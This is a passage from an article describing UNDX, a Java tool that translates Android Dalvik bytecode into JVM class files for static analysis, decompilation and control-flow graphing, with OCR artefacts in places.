theDefault) ; 

il . append (ih) ; 



Figure 12: Dalvik Code 
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Figure 13: JVM Code 
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Figure 14: Static Analysis 
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Figure 15: Decompilation 
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Figure 16: Graph With DIA 




instructions shown in Figure 12 and Figure 13 illustrates 
the transformation results. To achive this result we have 
to comply to some invariant constraints, we have to as- 
sign sound Dalvikregstojvm stack positions. To violate 
the JVM verifier as less as possible we want to obey 
stack balance rule, when processing the opcodes. Very 
important also is to provide proper type inference of 
the object references on the stack (reconstruct flow of 
data assignment opcodes). This is often tricky and fails 
in the set of cases, where the Dalvik reused registers 
for objects of differing types. This detail illustrates well 
how hardware and memory constraints in mobile de- 
vices influenced the design of the Dalvik architecture. 

Store generated data in BCEL structures: After 
all methods in all classes are parsed, processing is 
finished, and as result we have a class file for each 
defined class in the dex file. 

Static analysis of the code 

Now that we have bytecode generated from the Dalvik 
code, what can we do with it. We could analyze the 
code with static checking tools, like (findbugs) to find 
programming bugs, vulnerabilities, license violations 
with tool support (see Figure 14). If we are an experi- 
enced reverse engineer and already learned that fully 
automated tools are not the ultimate choice in RE, we 
stuff the class files in a decompiler (JAD, JD-GUI), see 
Figure 15 to receive JAVA-like code to speed up pro- 
gram understanding, which is the reverse engineers 
primary goal. Be aware, that you receive structural 
equivalent and not a 1 00 percent verbatim copy of 
the original source, as some differences due to heavy 
transformation processes inbetween show their effect, 
such as reuse of stack variables. 

In certain cases it is recommended to use class file 
disassembler (javap), when the decompiler was not 
able to complete due to heavy use of obfuscation. 

Although real reverse engineers prefer code, UNDX 
can also compete in the RE softball league, using more 
graphs and consume less brain. If you want that instead, 
write a 20 liner groovy script, and transfer the nodes and 
arrows of the control flow graph (like the one offered by 
findbugs) into a nice graph in the graphing language of 
your choice. Figure 16 shows that approach using DIA. 



SUMMARY AND TRIVIA 

UNDX consists of about 4000 lines of code, which are 
written in JAVA, only external dependency is BCEL. 
It uses the command line only, but you could write a 
GUI and contribute it to the project, as the licensing 
is committer-friendly GPL. The code is available at 
http://www.illegalaccess.org/undx/. 

At this point we thank Dan Bornstein (again), for 
suggesting the UNDX name. • 
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